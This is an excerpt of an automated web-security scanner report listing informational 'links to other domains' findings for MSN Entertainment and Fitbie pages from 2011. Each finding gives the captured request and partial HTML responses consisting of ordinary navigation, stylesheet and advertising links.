http://entcss.s-redacted/styles/e9613.css
http://entcss.s-redacted/styles/entertainment9613.css
http://entcss.s-redacted/styles/gtl_sitegeneric9613.css
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://entimg.s-redacted/i/grandprix/msft.png
http://entimg.s-redacted/i/grandprix/nav_pipe.gif
http://entimg.s-redacted/i/ms/ms_logo.gif
http://entimg.s-redacted/i/sp.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/resources/neutral/launchhelp.js
http://img1.video.s-msn.com/v/js/MsnVideoUx_Min.js
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?Form=a25
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406051&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.redacted%2Fvideo%2F%3Ffrom%3Den-us_msnhp&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.redacted%2fvideo%2f%3ffrom%3den-us_msnhp%26ppcb%3d
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /video/?from=en-us_msnhp HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 26764
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=b23d5b2d8868446290c3a8adda5bf228; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:47:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
MSN Entert
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/e9613.css" rev="stylesheet" type="text/css"/>
<style>
...[SNIP]...
</style>
<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><link href="http://entcss.s-msn.com/i/video/ent/v5/css/custom_0047.css" rel="stylesheet" type="text/css" >
<link href="http://blstc.msn.com/br/chan/css/1/cntwmodule.css" rel="stylesheet" type="text/css" />
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" rel="">Careers & Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps & Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections & Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=a25">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406051&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.redacted%2Fvideo%2F%3Ffrom%3Den-us_msnhp&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.redacted%2fvideo%2f%3ffrom%3den-us_msnhp%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<td valign="top"><SCRIPT type=text/javascript src="http://img1.video.s-redacted/v/js/MsnVideoUx_Min.js"></SCRIPT>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

22.80. http://entertainment.redacted/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/video/

Issue detail

The page was loaded from a URL containing a query string:

http://entertainment.msn.com/video/?from=en-us_msnhp

The response contains the following links to other domains:

http://download.live.com/?sku=messenger
http://entcss.s-redacted/App_Themes/IE7/IE79613.css
http://entcss.s-redacted/i/video/ent/v5/css/custom_0047.css
http://entcss.s-redacted/styles/e9613.css
http://entcss.s-redacted/styles/entertainment9613.css
http://entcss.s-redacted/styles/gtl_sitegeneric9613.css
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://entimg.s-redacted/i/grandprix/msft.png
http://entimg.s-redacted/i/grandprix/nav_pipe.gif
http://entimg.s-redacted/i/ms/ms_logo.gif
http://entimg.s-redacted/i/sp.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/resources/neutral/launchhelp.js
http://img1.video.s-msn.com/v/js/MsnVideoUx_Min.js
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?Form=a25
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344772&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.redacted%2Fvideo%2F%3Ffrom%3Den-us_msnhp&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.redacted%2fvideo%2f%3ffrom%3den-us_msnhp%26ppcb%3d
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /video/?from=en-us_msnhp HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 26764
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=37b684207d7f4909a4bd8feb4ef9d03d; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
MSN Entert
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/e9613.css" rev="stylesheet" type="text/css"/>
<style>
...[SNIP]...
</style>
<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><link href="http://entcss.s-msn.com/i/video/ent/v5/css/custom_0047.css" rel="stylesheet" type="text/css" >
<link href="http://blstc.msn.com/br/chan/css/1/cntwmodule.css" rel="stylesheet" type="text/css" />
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" rel="">Careers & Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps & Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections & Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=a25">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344772&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.redacted%2Fvideo%2F%3Ffrom%3Den-us_msnhp&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.redacted%2fvideo%2f%3ffrom%3den-us_msnhp%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<td valign="top"><SCRIPT type=text/javascript src="http://img1.video.s-redacted/v/js/MsnVideoUx_Min.js"></SCRIPT>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

22.81. http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.redacted
Path:	/eat-right/tips/stock-your-refrigerator-weight-loss

Issue detail

The page was loaded from a URL containing a query string:

http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://digg.com/submit?url=http://fitbie.msn.com/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002
http://eatthis.menshealth.com/slideshow/6-rules-good-nutrition?cm_mmc=Fit_Life-_-Stock%20your%20refrigerator%20for%20weight%20loss-_-Slideshow-_-6%20Rules%20of%20good%20nutrition
http://images.rodale.com/dca/400Cal-navButton.gif
http://images.rodale.com/fitlife/modules/happy-healthy-woman-laughing-th.jpg
http://img.widgets.video.s-redacted/js/embed.js
http://insidemsn.wordpress.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalfitlife.112.2o7.net/b/ss/msnportalfitlife/1/H.1--NS/0
http://preferences.rodale.com/
http://twitter.com/Fitbie
http://twitter.com/home?status=http://fitbie.msn.com/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002
http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix
http://www.400caloriefix.com/fl/?keycode=152106
http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffitbie.redacted%2Feat-right%2Ftips%2Fstock-your-refrigerator-weight-loss&linkname=Stock%20Your%20Refrigerator%20for%20Weight%20Loss%20%7C%20Fitbie
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=A8
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/home.php?
http://www.facebook.com/plugins/like.php?href=http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002&layout=button_count&show_faces=false&action=like&colorscheme=light;
http://www.facebook.com/sharer.php?u=/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002
http://www.facebook.com/sharer.php?u=http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002
http://www.menshealth.com/
http://www.menshealth.com/mhlists/cut_dietary_fat/index.php?cm_mmc=Fit_Life-_-Stock%20Your%20Regfrigerator%20For%20Weight%20Loss-_-Article-_-8%20Ways%20to%20Cut%20Fat%20Without%20Realizing%20It%20RL
http://www.menshealth.com/mhlists/diet_strategies/index.php?cm_mmc=Fit_Life-_-Stock%20Your%20Refrigerator%20For%20Weight%20Loss-_-Article-_-Outwit%20The%20Leading%20Weight%20Loss%20Traps%20For%20Guys%20RL
http://www.menshealth.com/mhlists/healthier_foods/index.php?cm_mmc=Fit_Life-_-Stock%20Your%20Refrigerator%20For%20Weight%20Loss-_-Article-_-10%20Painless%20Way%20To%20Upgrade%20Your%20Diet%20RL
http://www.myhomeredacted/
http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean
http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga
http://www.walkoffweightbook.com/fl/?keycode=142336&cm_mmc=BeFit.com-_-Module-_-Homepage-_-Walk%20Off%20Weight%20Book
http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false
https://shop.fitbie.com/
https://shop.fitbie.com/the-lean-belly-prescription.html?keycode=149552

Request

GET /eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002 HTTP/1.1
Host: fitbie.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1296335106-1"
Last-Modified: Sat, 29 Jan 2011 21:05:06 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=33530
Expires: Sun, 30 Jan 2011 09:05:15 GMT
Date: Sat, 29 Jan 2011 23:46:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div><img src="http://msnportalfitlife.112.2O7.net/b/ss/msnportalfitlife/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=A8">Bing</a></span><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div>
   <a target="_blank" href="http://www.400caloriefix.com/fl/?keycode=152106" tabindex="8" class="promo"><img src="http://images.rodale.com/dca/400Cal-navButton.gif" alt="" border="0" width="80" height="31" /></a>
...[SNIP]...
<div class="shop-fitlife"><a href="https://shop.fitbie.com" title="shop fitbie" target="_blank"><img src="/sites/all/themes/fitlife/images/shop_fitbie.gif" alt="shop fitbie" />
...[SNIP]...
<div class="free-trial">
<a href="http://www.walkoffweightbook.com/fl/?keycode=142336&cm_mmc=BeFit.com-_-Module-_-Homepage-_-Walk%20Off%20Weight%20Book" target="_blank" title="ad">Get a Free Trial ></a>
<a href="http://www.walkoffweightbook.com/fl/?keycode=142336&cm_mmc=BeFit.com-_-Module-_-Homepage-_-Walk%20Off%20Weight%20Book" target="_blank" title="ad"><img src="/sites/all/themes/fitlife/images/small_ad_img.png" alt="ad" />
...[SNIP]...
<li class="img"><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title=""><img src="/sites/default/files/2015348_043341_pb_cvc_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title=""><img src="/sites/default/files/2015348_wowmp3_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title=""><img src="/sites/default/files/400calfix.gif" alt="" />
...[SNIP]...
<li><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title="">Learn more</a>
...[SNIP]...
<li class="img"><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title=""><img src="/sites/default/files/2015384_ridelean_2.gif" alt="" />
...[SNIP]...
<li><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title="">Learn more!</a>
...[SNIP]...
</span>
